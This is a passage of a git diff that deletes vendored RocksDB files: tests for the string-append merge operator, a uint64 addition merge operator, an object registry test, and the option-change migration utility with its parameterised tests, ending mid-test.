-// Generate semi random keys/words from a small distribution.
-TEST_F(StringAppendOperatorTest, RandomMixGetAppend) {
-  auto db = OpenDb(' ');
-  StringLists slists(db);
-
-  // Generate a list of random keys and values
-  const int kWordCount = 15;
-  std::string words[] = {"sdasd", "triejf", "fnjsdfn", "dfjisdfsf", "342839",
-                         "dsuha", "mabuais", "sadajsid", "jf9834hf", "2d9j89",
-                         "dj9823jd", "a", "dk02ed2dh", "$(jd4h984$(*", "mabz"};
-  const int kKeyCount = 6;
-  std::string keys[] = {"dhaiusdhu", "denidw", "daisda", "keykey", "muki",
-                        "shzassdianmd"};
-
-  // Will store a local copy of all data in order to verify correctness
-  std::map<std::string, std::string> parallel_copy;
-
-  // Generate a bunch of random queries (Append and Get)!
-  enum query_t  { APPEND_OP, GET_OP, NUM_OPS };
-  Random randomGen(1337);       //deterministic seed; always get same results!
-
-  const int kNumQueries = 30;
-  for (int q=0; q<kNumQueries; ++q) {
-    // Generate a random query (Append or Get) and random parameters
-    query_t query = (query_t)randomGen.Uniform((int)NUM_OPS);
-    std::string key = keys[randomGen.Uniform((int)kKeyCount)];
-    std::string word = words[randomGen.Uniform((int)kWordCount)];
-
-    // Apply the query and any checks.
-    if (query == APPEND_OP) {
-
-      // Apply the rocksdb test-harness Append defined above
-      slists.Append(key, word);  //apply the rocksdb append
-
-      // Apply the similar "Append" to the parallel copy
-      if (parallel_copy[key].size() > 0) {
-        parallel_copy[key] += " " + word;
-      } else {
-        parallel_copy[key] = word;
-      }
-
-    } else if (query == GET_OP) {
-      // Assumes that a non-existent key just returns <empty>
-      std::string res;
-      slists.Get(key, &res);
-      ASSERT_EQ(res, parallel_copy[key]);
-    }
-
-  }
-
-}
-
-TEST_F(StringAppendOperatorTest, BIGRandomMixGetAppend) {
-  auto db = OpenDb(' ');
-  StringLists slists(db);
-
-  // Generate a list of random keys and values
-  const int kWordCount = 15;
-  std::string words[] = {"sdasd", "triejf", "fnjsdfn", "dfjisdfsf", "342839",
-                         "dsuha", "mabuais", "sadajsid", "jf9834hf", "2d9j89",
-                         "dj9823jd", "a", "dk02ed2dh", "$(jd4h984$(*", "mabz"};
-  const int kKeyCount = 6;
-  std::string keys[] = {"dhaiusdhu", "denidw", "daisda", "keykey", "muki",
-                        "shzassdianmd"};
-
-  // Will store a local copy of all data in order to verify correctness
-  std::map<std::string, std::string> parallel_copy;
-
-  // Generate a bunch of random queries (Append and Get)!
-  enum query_t  { APPEND_OP, GET_OP, NUM_OPS };
-  Random randomGen(9138204);       // deterministic seed
-
-  const int kNumQueries = 1000;
-  for (int q=0; q<kNumQueries; ++q) {
-    // Generate a random query (Append or Get) and random parameters
-    query_t query = (query_t)randomGen.Uniform((int)NUM_OPS);
-    std::string key = keys[randomGen.Uniform((int)kKeyCount)];
-    std::string word = words[randomGen.Uniform((int)kWordCount)];
-
-    //Apply the query and any checks.
-    if (query == APPEND_OP) {
-
-      // Apply the rocksdb test-harness Append defined above
-      slists.Append(key, word);  //apply the rocksdb append
-
-      // Apply the similar "Append" to the parallel copy
-      if (parallel_copy[key].size() > 0) {
-        parallel_copy[key] += " " + word;
-      } else {
-        parallel_copy[key] = word;
-      }
-
-    } else if (query == GET_OP) {
-      // Assumes that a non-existent key just returns <empty>
-      std::string res;
-      slists.Get(key, &res);
-      ASSERT_EQ(res, parallel_copy[key]);
-    }
-
-  }
-
-}
-
-TEST_F(StringAppendOperatorTest, PersistentVariousKeys) {
-  // Perform the following operations in limited scope
-  {
-    auto db = OpenDb('\n');
-    StringLists slists(db);
-
-    slists.Append("c", "asdasd");
-    slists.Append("a", "x");
-    slists.Append("b", "y");
-    slists.Append("a", "t");
-    slists.Append("a", "r");
-    slists.Append("b", "2");
-    slists.Append("c", "asdasd");
-
-    std::string a, b, c;
-    slists.Get("a", &a);
-    slists.Get("b", &b);
-    slists.Get("c", &c);
-
-    ASSERT_EQ(a, "x\nt\nr");
-    ASSERT_EQ(b, "y\n2");
-    ASSERT_EQ(c, "asdasd\nasdasd");
-  }
-
-  // Reopen the database (the previous changes should persist / be remembered)
-  {
-    auto db = OpenDb('\n');
-    StringLists slists(db);
-
-    slists.Append("c", "bbnagnagsx");
-    slists.Append("a", "sa");
-    slists.Append("b", "df");
-    slists.Append("a", "gh");
-    slists.Append("a", "jk");
-    slists.Append("b", "l;");
-    slists.Append("c", "rogosh");
-
-    // The previous changes should be on disk (L0)
-    // The most recent changes should be in memory (MemTable)
-    // Hence, this will test both Get() paths.
-    std::string a, b, c;
-    slists.Get("a", &a);
-    slists.Get("b", &b);
-    slists.Get("c", &c);
-
-    ASSERT_EQ(a, "x\nt\nr\nsa\ngh\njk");
-    ASSERT_EQ(b, "y\n2\ndf\nl;");
-    ASSERT_EQ(c, "asdasd\nasdasd\nbbnagnagsx\nrogosh");
-  }
-
-  // Reopen the database (the previous changes should persist / be remembered)
-  {
-    auto db = OpenDb('\n');
-    StringLists slists(db);
-
-    // All changes should be on disk. This will test VersionSet Get()
-    std::string a, b, c;
-    slists.Get("a", &a);
-    slists.Get("b", &b);
-    slists.Get("c", &c);
-
-    ASSERT_EQ(a, "x\nt\nr\nsa\ngh\njk");
-    ASSERT_EQ(b, "y\n2\ndf\nl;");
-    ASSERT_EQ(c, "asdasd\nasdasd\nbbnagnagsx\nrogosh");
-  }
-}
-
-TEST_F(StringAppendOperatorTest, PersistentFlushAndCompaction) {
-  // Perform the following operations in limited scope
-  {
-    auto db = OpenDb('\n');
-    StringLists slists(db);
-    std::string a, b, c;
-    bool success;
-
-    // Append, Flush, Get
-    slists.Append("c", "asdasd");
-    db->Flush(rocksdb::FlushOptions());
-    success = slists.Get("c", &c);
-    ASSERT_TRUE(success);
-    ASSERT_EQ(c, "asdasd");
-
-    // Append, Flush, Append, Get
-    slists.Append("a", "x");
-    slists.Append("b", "y");
-    db->Flush(rocksdb::FlushOptions());
-    slists.Append("a", "t");
-    slists.Append("a", "r");
-    slists.Append("b", "2");
-
-    success = slists.Get("a", &a);
-    assert(success == true);
-    ASSERT_EQ(a, "x\nt\nr");
-
-    success = slists.Get("b", &b);
-    assert(success == true);
-    ASSERT_EQ(b, "y\n2");
-
-    // Append, Get
-    success = slists.Append("c", "asdasd");
-    assert(success);
-    success = slists.Append("b", "monkey");
-    assert(success);
-
-    // I omit the "assert(success)" checks here.
-    slists.Get("a", &a);
-    slists.Get("b", &b);
-    slists.Get("c", &c);
-
-    ASSERT_EQ(a, "x\nt\nr");
-    ASSERT_EQ(b, "y\n2\nmonkey");
-    ASSERT_EQ(c, "asdasd\nasdasd");
-  }
-
-  // Reopen the database (the previous changes should persist / be remembered)
-  {
-    auto db = OpenDb('\n');
-    StringLists slists(db);
-    std::string a, b, c;
-
-    // Get (Quick check for persistence of previous database)
-    slists.Get("a", &a);
-    ASSERT_EQ(a, "x\nt\nr");
-
-    //Append, Compact, Get
-    slists.Append("c", "bbnagnagsx");
-    slists.Append("a", "sa");
-    slists.Append("b", "df");
-    db->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-    slists.Get("a", &a);
-    slists.Get("b", &b);
-    slists.Get("c", &c);
-    ASSERT_EQ(a, "x\nt\nr\nsa");
-    ASSERT_EQ(b, "y\n2\nmonkey\ndf");
-    ASSERT_EQ(c, "asdasd\nasdasd\nbbnagnagsx");
-
-    // Append, Get
-    slists.Append("a", "gh");
-    slists.Append("a", "jk");
-    slists.Append("b", "l;");
-    slists.Append("c", "rogosh");
-    slists.Get("a", &a);
-    slists.Get("b", &b);
-    slists.Get("c", &c);
-    ASSERT_EQ(a, "x\nt\nr\nsa\ngh\njk");
-    ASSERT_EQ(b, "y\n2\nmonkey\ndf\nl;");
-    ASSERT_EQ(c, "asdasd\nasdasd\nbbnagnagsx\nrogosh");
-
-    // Compact, Get
-    db->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-    ASSERT_EQ(a, "x\nt\nr\nsa\ngh\njk");
-    ASSERT_EQ(b, "y\n2\nmonkey\ndf\nl;");
-    ASSERT_EQ(c, "asdasd\nasdasd\nbbnagnagsx\nrogosh");
-
-    // Append, Flush, Compact, Get
-    slists.Append("b", "afcg");
-    db->Flush(rocksdb::FlushOptions());
-    db->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-    slists.Get("b", &b);
-    ASSERT_EQ(b, "y\n2\nmonkey\ndf\nl;\nafcg");
-  }
-}
-
-TEST_F(StringAppendOperatorTest, SimpleTestNullDelimiter) {
-  auto db = OpenDb('\0');
-  StringLists slists(db);
-
-  slists.Append("k1", "v1");
-  slists.Append("k1", "v2");
-  slists.Append("k1", "v3");
-
-  std::string res;
-  bool status = slists.Get("k1", &res);
-  ASSERT_TRUE(status);
-
-  // Construct the desired string. Default constructor doesn't like '\0' chars.
-  std::string checker("v1,v2,v3");    // Verify that the string is right size.
-  checker[2] = '\0';                  // Use null delimiter instead of comma.
-  checker[5] = '\0';
-  assert(checker.size() == 8);        // Verify it is still the correct size
-
-  // Check that the rocksdb result string matches the desired string
-  assert(res.size() == checker.size());
-  ASSERT_EQ(res, checker);
-}
-
-} // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  // Run with regular database
-  int result;
-  {
-    fprintf(stderr, "Running tests with regular db and operator.\n");
-    StringAppendOperatorTest::SetOpenDbFunction(&OpenNormalDb);
-    result = RUN_ALL_TESTS();
-  }
-
-#ifndef ROCKSDB_LITE  // TtlDb is not supported in Lite
-  // Run with TTL
-  {
-    fprintf(stderr, "Running tests with ttl db and generic operator.\n");
-    StringAppendOperatorTest::SetOpenDbFunction(&OpenTtlDb);
-    result |= RUN_ALL_TESTS();
-  }
-#endif  // !ROCKSDB_LITE
-
-  return result;
-}
diff --git a/thirdparty/rocksdb/utilities/merge_operators/uint64add.cc b/thirdparty/rocksdb/utilities/merge_operators/uint64add.cc
deleted file mode 100644
index d782173..0000000
--- a/thirdparty/rocksdb/utilities/merge_operators/uint64add.cc
+++ /dev/null
@@ -1,73 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <memory>
-
-#include "rocksdb/env.h"
-#include "rocksdb/merge_operator.h"
-#include "rocksdb/slice.h"
-#include "util/coding.h"
-#include "util/logging.h"
-#include "utilities/merge_operators.h"
-
-using namespace rocksdb;
-
-namespace { // anonymous namespace
-
-// A 'model' merge operator with uint64 addition semantics
-// Implemented as an AssociativeMergeOperator for simplicity and example.
-class UInt64AddOperator : public AssociativeMergeOperator {
- public:
-  virtual bool Merge(const Slice& key,
-                     const Slice* existing_value,
-                     const Slice& value,
-                     std::string* new_value,
-                     Logger* logger) const override {
-    uint64_t orig_value = 0;
-    if (existing_value){
-      orig_value = DecodeInteger(*existing_value, logger);
-    }
-    uint64_t operand = DecodeInteger(value, logger);
-
-    assert(new_value);
-    new_value->clear();
-    PutFixed64(new_value, orig_value + operand);
-
-    return true;  // Return true always since corruption will be treated as 0
-  }
-
-  virtual const char* Name() const override {
-    return "UInt64AddOperator";
-  }
-
- private:
-  // Takes the string and decodes it into a uint64_t
-  // On error, prints a message and returns 0
-  uint64_t DecodeInteger(const Slice& value, Logger* logger) const {
-    uint64_t result = 0;
-
-    if (value.size() == sizeof(uint64_t)) {
-      result = DecodeFixed64(value.data());
-    } else if (logger != nullptr) {
-      // If value is corrupted, treat it as 0
-      ROCKS_LOG_ERROR(logger, "uint64 value corruption, size: %" ROCKSDB_PRIszt
-                              " > %" ROCKSDB_PRIszt,
-                      value.size(), sizeof(uint64_t));
-    }
-
-    return result;
-  }
-
-};
-
-}
-
-namespace rocksdb {
-
-std::shared_ptr<MergeOperator> MergeOperators::CreateUInt64AddOperator() {
-  return std::make_shared<UInt64AddOperator>();
-}
-
-}
diff --git a/thirdparty/rocksdb/utilities/object_registry_test.cc b/thirdparty/rocksdb/utilities/object_registry_test.cc
deleted file mode 100644
index 40fb387..0000000
--- a/thirdparty/rocksdb/utilities/object_registry_test.cc
+++ /dev/null
@@ -1,72 +0,0 @@
-// Copyright (c) 2016-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include "rocksdb/utilities/object_registry.h"
-#include "util/testharness.h"
-
-namespace rocksdb {
-
-class EnvRegistryTest : public testing::Test {
- public:
-  static int num_a, num_b;
-};
-
-int EnvRegistryTest::num_a = 0;
-int EnvRegistryTest::num_b = 0;
-
-static Registrar<Env> test_reg_a("a://.*", [](const std::string& uri,
-                                              std::unique_ptr<Env>* env_guard) {
-  ++EnvRegistryTest::num_a;
-  return Env::Default();
-});
-
-static Registrar<Env> test_reg_b("b://.*", [](const std::string& uri,
-                                              std::unique_ptr<Env>* env_guard) {
-  ++EnvRegistryTest::num_b;
-  // Env::Default() is a singleton so we can't grant ownership directly to the
-  // caller - we must wrap it first.
-  env_guard->reset(new EnvWrapper(Env::Default()));
-  return env_guard->get();
-});
-
-TEST_F(EnvRegistryTest, Basics) {
-  std::unique_ptr<Env> env_guard;
-  auto res = NewCustomObject<Env>("a://test", &env_guard);
-  ASSERT_NE(res, nullptr);
-  ASSERT_EQ(env_guard, nullptr);
-  ASSERT_EQ(1, num_a);
-  ASSERT_EQ(0, num_b);
-
-  res = NewCustomObject<Env>("b://test", &env_guard);
-  ASSERT_NE(res, nullptr);
-  ASSERT_NE(env_guard, nullptr);
-  ASSERT_EQ(1, num_a);
-  ASSERT_EQ(1, num_b);
-
-  res = NewCustomObject<Env>("c://test", &env_guard);
-  ASSERT_EQ(res, nullptr);
-  ASSERT_EQ(env_guard, nullptr);
-  ASSERT_EQ(1, num_a);
-  ASSERT_EQ(1, num_b);
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-
-#else  // ROCKSDB_LITE
-#include <stdio.h>
-
-int main(int argc, char** argv) {
-  fprintf(stderr, "SKIPPED as EnvRegistry is not supported in ROCKSDB_LITE\n");
-  return 0;
-}
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/option_change_migration/option_change_migration.cc b/thirdparty/rocksdb/utilities/option_change_migration/option_change_migration.cc
deleted file mode 100644
index c9e7fbc..0000000
--- a/thirdparty/rocksdb/utilities/option_change_migration/option_change_migration.cc
+++ /dev/null
@@ -1,165 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "rocksdb/utilities/option_change_migration.h"
-
-#ifndef ROCKSDB_LITE
-#include "rocksdb/db.h"
-
-namespace rocksdb {
-namespace {
-// Return a version of Options `opts` that allow us to open/write into a DB
-// without triggering an automatic compaction or stalling. This is guaranteed
-// by disabling automatic compactions and using huge values for stalling
-// triggers.
-Options GetNoCompactionOptions(const Options& opts) {
-  Options ret_opts = opts;
-  ret_opts.disable_auto_compactions = true;
-  ret_opts.level0_slowdown_writes_trigger = 999999;
-  ret_opts.level0_stop_writes_trigger = 999999;
-  ret_opts.soft_pending_compaction_bytes_limit = 0;
-  ret_opts.hard_pending_compaction_bytes_limit = 0;
-  return ret_opts;
-}
-
-Status OpenDb(const Options& options, const std::string& dbname,
-              std::unique_ptr<DB>* db) {
-  db->reset();
-  DB* tmpdb;
-  Status s = DB::Open(options, dbname, &tmpdb);
-  if (s.ok()) {
-    db->reset(tmpdb);
-  }
-  return s;
-}
-
-Status CompactToLevel(const Options& options, const std::string& dbname,
-                      int dest_level, bool need_reopen) {
-  std::unique_ptr<DB> db;
-  Options no_compact_opts = GetNoCompactionOptions(options);
-  if (dest_level == 0) {
-    // L0 has strict sequenceID requirements to files to it. It's safer
-    // to only put one compacted file to there.
-    // This is only used for converting to universal compaction with
-    // only one level. In this case, compacting to one file is also
-    // optimal.
-    no_compact_opts.target_file_size_base = 999999999999999;
-    no_compact_opts.max_compaction_bytes = 999999999999999;
-  }
-  Status s = OpenDb(no_compact_opts, dbname, &db);
-  if (!s.ok()) {
-    return s;
-  }
-  CompactRangeOptions cro;
-  cro.change_level = true;
-  cro.target_level = dest_level;
-  if (dest_level == 0) {
-    cro.bottommost_level_compaction = BottommostLevelCompaction::kForce;
-  }
-  db->CompactRange(cro, nullptr, nullptr);
-
-  if (need_reopen) {
-    // Need to restart DB to rewrite the manifest file.
-    // In order to open a DB with specific num_levels, the manifest file should
-    // contain no record that mentiones any level beyond num_levels. Issuing a
-    // full compaction will move all the data to a level not exceeding
-    // num_levels, but the manifest may still contain previous record mentioning
-    // a higher level. Reopening the DB will force the manifest to be rewritten
-    // so that those records will be cleared.
-    db.reset();
-    s = OpenDb(no_compact_opts, dbname, &db);
-  }
-  return s;
-}
-
-Status MigrateToUniversal(std::string dbname, const Options& old_opts,
-                          const Options& new_opts) {
-  if (old_opts.num_levels <= new_opts.num_levels ||
-      old_opts.compaction_style == CompactionStyle::kCompactionStyleFIFO) {
-    return Status::OK();
-  } else {
-    bool need_compact = false;
-    {
-      std::unique_ptr<DB> db;
-      Options opts = GetNoCompactionOptions(old_opts);
-      Status s = OpenDb(opts, dbname, &db);
-      if (!s.ok()) {
-        return s;
-      }
-      ColumnFamilyMetaData metadata;
-      db->GetColumnFamilyMetaData(&metadata);
-      if (!metadata.levels.empty() &&
-          metadata.levels.back().level >= new_opts.num_levels) {
-        need_compact = true;
-      }
-    }
-    if (need_compact) {
-      return CompactToLevel(old_opts, dbname, new_opts.num_levels - 1, true);
-    }
-    return Status::OK();
-  }
-}
-
-Status MigrateToLevelBase(std::string dbname, const Options& old_opts,
-                          const Options& new_opts) {
-  if (!new_opts.level_compaction_dynamic_level_bytes) {
-    if (old_opts.num_levels == 1) {
-      return Status::OK();
-    }
-    // Compact everything to level 1 to guarantee it can be safely opened.
-    Options opts = old_opts;
-    opts.target_file_size_base = new_opts.target_file_size_base;
-    // Although sometimes we can open the DB with the new option without error,
-    // We still want to compact the files to avoid the LSM tree to stuck
-    // in bad shape. For example, if the user changed the level size
-    // multiplier from 4 to 8, with the same data, we will have fewer
-    // levels. Unless we issue a full comaction, the LSM tree may stuck
-    // with more levels than needed and it won't recover automatically.
-    return CompactToLevel(opts, dbname, 1, true);
-  } else {
-    // Compact everything to the last level to guarantee it can be safely
-    // opened.
-    if (old_opts.num_levels == 1) {
-      return Status::OK();
-    } else if (new_opts.num_levels > old_opts.num_levels) {
-      // Dynamic level mode requires data to be put in the last level first.
-      return CompactToLevel(new_opts, dbname, new_opts.num_levels - 1, false);
-    } else {
-      Options opts = old_opts;
-      opts.target_file_size_base = new_opts.target_file_size_base;
-      return CompactToLevel(opts, dbname, new_opts.num_levels - 1, true);
-    }
-  }
-}
-}  // namespace
-
-Status OptionChangeMigration(std::string dbname, const Options& old_opts,
-                             const Options& new_opts) {
-  if (old_opts.compaction_style == CompactionStyle::kCompactionStyleFIFO) {
-    // LSM generated by FIFO compation can be opened by any compaction.
-    return Status::OK();
-  } else if (new_opts.compaction_style ==
-             CompactionStyle::kCompactionStyleUniversal) {
-    return MigrateToUniversal(dbname, old_opts, new_opts);
-  } else if (new_opts.compaction_style ==
-             CompactionStyle::kCompactionStyleLevel) {
-    return MigrateToLevelBase(dbname, old_opts, new_opts);
-  } else if (new_opts.compaction_style ==
-             CompactionStyle::kCompactionStyleFIFO) {
-    return CompactToLevel(old_opts, dbname, 0, true);
-  } else {
-    return Status::NotSupported(
-        "Do not how to migrate to this compaction style");
-  }
-}
-}  // namespace rocksdb
-#else
-namespace rocksdb {
-Status OptionChangeMigration(std::string dbname, const Options& old_opts,
-                             const Options& new_opts) {
-  return Status::NotSupported();
-}
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/option_change_migration/option_change_migration_test.cc b/thirdparty/rocksdb/utilities/option_change_migration/option_change_migration_test.cc
deleted file mode 100644
index 1f239b7..0000000
--- a/thirdparty/rocksdb/utilities/option_change_migration/option_change_migration_test.cc
+++ /dev/null
@@ -1,425 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "rocksdb/utilities/option_change_migration.h"
-#include <set>
-#include "db/db_test_util.h"
-#include "port/stack_trace.h"
-namespace rocksdb {
-
-class DBOptionChangeMigrationTests
-    : public DBTestBase,
-      public testing::WithParamInterface<
-          std::tuple<int, int, bool, int, int, bool>> {
- public:
-  DBOptionChangeMigrationTests()
-      : DBTestBase("/db_option_change_migration_test") {
-    level1_ = std::get<0>(GetParam());
-    compaction_style1_ = std::get<1>(GetParam());
-    is_dynamic1_ = std::get<2>(GetParam());
-
-    level2_ = std::get<3>(GetParam());
-    compaction_style2_ = std::get<4>(GetParam());
-    is_dynamic2_ = std::get<5>(GetParam());
-  }
-
-  // Required if inheriting from testing::WithParamInterface<>
-  static void SetUpTestCase() {}
-  static void TearDownTestCase() {}
-
-  int level1_;
-  int compaction_style1_;
-  bool is_dynamic1_;
-
-  int level2_;
-  int compaction_style2_;
-  bool is_dynamic2_;
-};
-
-#ifndef ROCKSDB_LITE
-TEST_P(DBOptionChangeMigrationTests, Migrate1) {
-  Options old_options = CurrentOptions();
-  old_options.compaction_style =
-      static_cast<CompactionStyle>(compaction_style1_);
-  if (old_options.compaction_style == CompactionStyle::kCompactionStyleLevel) {
-    old_options.level_compaction_dynamic_level_bytes = is_dynamic1_;
-  }
-
-  old_options.level0_file_num_compaction_trigger = 3;
-  old_options.write_buffer_size = 64 * 1024;
-  old_options.target_file_size_base = 128 * 1024;
-  // Make level target of L1, L2 to be 200KB and 600KB
-  old_options.num_levels = level1_;
-  old_options.max_bytes_for_level_multiplier = 3;
-  old_options.max_bytes_for_level_base = 200 * 1024;
-
-  Reopen(old_options);
-
-  Random rnd(301);
-  int key_idx = 0;
-
-  // Generate at least 2MB of data
-  for (int num = 0; num < 20; num++) {
-    GenerateNewFile(&rnd, &key_idx);
-  }
-  dbfull()->TEST_WaitForFlushMemTable();
-  dbfull()->TEST_WaitForCompact();
-
-  // Will make sure exactly those keys are in the DB after migration.
-  std::set<std::string> keys;
-  {
-    std::unique_ptr<Iterator> it(db_->NewIterator(ReadOptions()));
-    it->SeekToFirst();
-    for (; it->Valid(); it->Next()) {
-      keys.insert(it->key().ToString());
-    }
-  }
-  Close();
-
-  Options new_options = old_options;
-  new_options.compaction_style =
-      static_cast<CompactionStyle>(compaction_style2_);
-  if (new_options.compaction_style == CompactionStyle::kCompactionStyleLevel) {
-    new_options.level_compaction_dynamic_level_bytes = is_dynamic2_;
-  }
-  new_options.target_file_size_base = 256 * 1024;
-  new_options.num_levels = level2_;
-  new_options.max_bytes_for_level_base = 150 * 1024;
-  new_options.max_bytes_for_level_multiplier = 4;
-  ASSERT_OK(OptionChangeMigration(dbname_, old_options, new_options));
-  Reopen(new_options);
-
-  // Wait for compaction to finish and make sure it can reopen
-  dbfull()->TEST_WaitForFlushMemTable();
-  dbfull()->TEST_WaitForCompact();
-  Reopen(new_options);
-
-  {
-    std::unique_ptr<Iterator> it(db_->NewIterator(ReadOptions()));
-    it->SeekToFirst();
-    for (std::string key : keys) {
-      ASSERT_TRUE(it->Valid());
-      ASSERT_EQ(key, it->key().ToString());
-      it->Next();
-    }
-    ASSERT_TRUE(!it->Valid());
-  }
-}
-
-TEST_P(DBOptionChangeMigrationTests, Migrate2) {
-  Options old_options = CurrentOptions();
-  old_options.compaction_style =
-      static_cast<CompactionStyle>(compaction_style2_);
-  if (old_options.compaction_style == CompactionStyle::kCompactionStyleLevel) {
-    old_options.level_compaction_dynamic_level_bytes = is_dynamic2_;
-  }
-  old_options.level0_file_num_compaction_trigger = 3;
-  old_options.write_buffer_size = 64 * 1024;
-  old_options.target_file_size_base = 128 * 1024;
-  // Make level target of L1, L2 to be 200KB and 600KB
-  old_options.num_levels = level2_;
-  old_options.max_bytes_for_level_multiplier = 3;
-  old_options.max_bytes_for_level_base = 200 * 1024;
-
-  Reopen(old_options);
-
-  Random rnd(301);
-  int key_idx = 0;
-
-  // Generate at least 2MB of data
-  for (int num = 0; num < 20; num++) {
-    GenerateNewFile(&rnd, &key_idx);
-  }
-  dbfull()->TEST_WaitForFlushMemTable();
-  dbfull()->TEST_WaitForCompact();
-
-  // Will make sure exactly those keys are in the DB after migration.
-  std::set<std::string> keys;
-  {
-    std::unique_ptr<Iterator> it(db_->NewIterator(ReadOptions()));
-    it->SeekToFirst();
-    for (; it->Valid(); it->Next()) {
-      keys.insert(it->key().ToString());
-    }
-  }
-
-  Close();
-
-  Options new_options = old_options;
-  new_options.compaction_style =
-      static_cast<CompactionStyle>(compaction_style1_);
-  if (new_options.compaction_style == CompactionStyle::kCompactionStyleLevel) {
-    new_options.level_compaction_dynamic_level_bytes = is_dynamic1_;
-  }
-  new_options.target_file_size_base = 256 * 1024;
-  new_options.num_levels = level1_;
-  new_options.max_bytes_for_level_base = 150 * 1024;
-  new_options.max_bytes_for_level_multiplier = 4;
-  ASSERT_OK(OptionChangeMigration(dbname_, old_options, new_options));
-  Reopen(new_options);
-  // Wait for compaction to finish and make sure it can reopen
-  dbfull()->TEST_WaitForFlushMemTable();
-  dbfull()->TEST_WaitForCompact();
-  Reopen(new_options);
-
-  {
-    std::unique_ptr<Iterator> it(db_->NewIterator(ReadOptions()));
-    it->SeekToFirst();
-    for (std::string key : keys) {
-      ASSERT_TRUE(it->Valid());
-      ASSERT_EQ(key, it->key().ToString());
-      it->Next();
-    }
-    ASSERT_TRUE(!it->Valid());
-  }
-}
-
-TEST_P(DBOptionChangeMigrationTests, Migrate3) {
-  Options old_options = CurrentOptions();
-  old_options.compaction_style =
-      static_cast<CompactionStyle>(compaction_style1_);
-  if (old_options.compaction_style == CompactionStyle::kCompactionStyleLevel) {
-    old_options.level_compaction_dynamic_level_bytes = is_dynamic1_;
-  }
-
-  old_options.level0_file_num_compaction_trigger = 3;
-  old_options.write_buffer_size = 64 * 1024;
-  old_options.target_file_size_base = 128 * 1024;
-  // Make level target of L1, L2 to be 200KB and 600KB
-  old_options.num_levels = level1_;
-  old_options.max_bytes_for_level_multiplier = 3;
-  old_options.max_bytes_for_level_base = 200 * 1024;
-
-  Reopen(old_options);
-  Random rnd(301);
-  for (int num = 0; num < 20; num++) {
-    for (int i = 0; i < 50; i++) {
-      ASSERT_OK(Put(Key(num * 100 + i), RandomString(&rnd, 900)));
-    }
-    Flush();
-    dbfull()->TEST_WaitForCompact();
-    if (num == 9) {
-      // Issue a full compaction to generate some zero-out files
-      CompactRangeOptions cro;
-      cro.bottommost_level_compaction = BottommostLevelCompaction::kForce;
-      dbfull()->CompactRange(cro, nullptr, nullptr);
-    }
-  }
-  dbfull()->TEST_WaitForFlushMemTable();
-  dbfull()->TEST_WaitForCompact();
-
-  // Will make sure exactly those keys are in the DB after migration.
-  std::set<std::string> keys;
-  {
-    std::unique_ptr<Iterator> it(db_->NewIterator(ReadOptions()));
-    it->SeekToFirst();
-    for (; it->Valid(); it->Next()) {
-      keys.insert(it->key().ToString());
-    }
-  }
-  Close();
-
-  Options new_options = old_options;
-  new_options.compaction_style =
-      static_cast<CompactionStyle>(compaction_style2_);
-  if (new_options.compaction_style == CompactionStyle::kCompactionStyleLevel) {
-    new_options.level_compaction_dynamic_level_bytes = is_dynamic2_;
-  }
-  new_options.target_file_size_base = 256 * 1024;
-  new_options.num_levels = level2_;
-  new_options.max_bytes_for_level_base = 150 * 1024;
-  new_options.max_bytes_for_level_multiplier = 4;
-  ASSERT_OK(OptionChangeMigration(dbname_, old_options, new_options));
-  Reopen(new_options);
-
-  // Wait for compaction to finish and make sure it can reopen
-  dbfull()->TEST_WaitForFlushMemTable();
-  dbfull()->TEST_WaitForCompact();
-  Reopen(new_options);
-
-  {
-    std::unique_ptr<Iterator> it(db_->NewIterator(ReadOptions()));
-    it->SeekToFirst();
-    for (std::string key : keys) {
-      ASSERT_TRUE(it->Valid());
-      ASSERT_EQ(key, it->key().ToString());
-      it->Next();
-    }
-    ASSERT_TRUE(!it->Valid());
-  }
-}
-
-TEST_P(DBOptionChangeMigrationTests, Migrate4) {
-  Options old_options = CurrentOptions();
-  old_options.compaction_style =
-      static_cast<CompactionStyle>(compaction_style2_);
-  if (old_options.compaction_style == CompactionStyle::kCompactionStyleLevel) {
-    old_options.level_compaction_dynamic_level_bytes = is_dynamic2_;
-  }
-  old_options.level0_file_num_compaction_trigger = 3;
-  old_options.write_buffer_size = 64 * 1024;
-  old_options.target_file_size_base = 128 * 1024;
-  // Make level target of L1, L2 to be 200KB and 600KB
-  old_options.num_levels = level2_;
-  old_options.max_bytes_for_level_multiplier = 3;
-  old_options.max_bytes_for_level_base = 200 * 1024;
-
-  Reopen(old_options);
-  Random rnd(301);
-  for (int num = 0; num < 20; num++) {
-    for (int i = 0; i < 50; i++) {
-      ASSERT_OK(Put(Key(num * 100 + i), RandomString(&rnd, 900)));
-    }
-    Flush();
-    dbfull()->TEST_WaitForCompact();
-    if (num == 9) {
-      // Issue a full compaction to generate some zero-out files
-      CompactRangeOptions cro;
-      cro.bottommost_level_compaction = BottommostLevelCompaction::kForce;
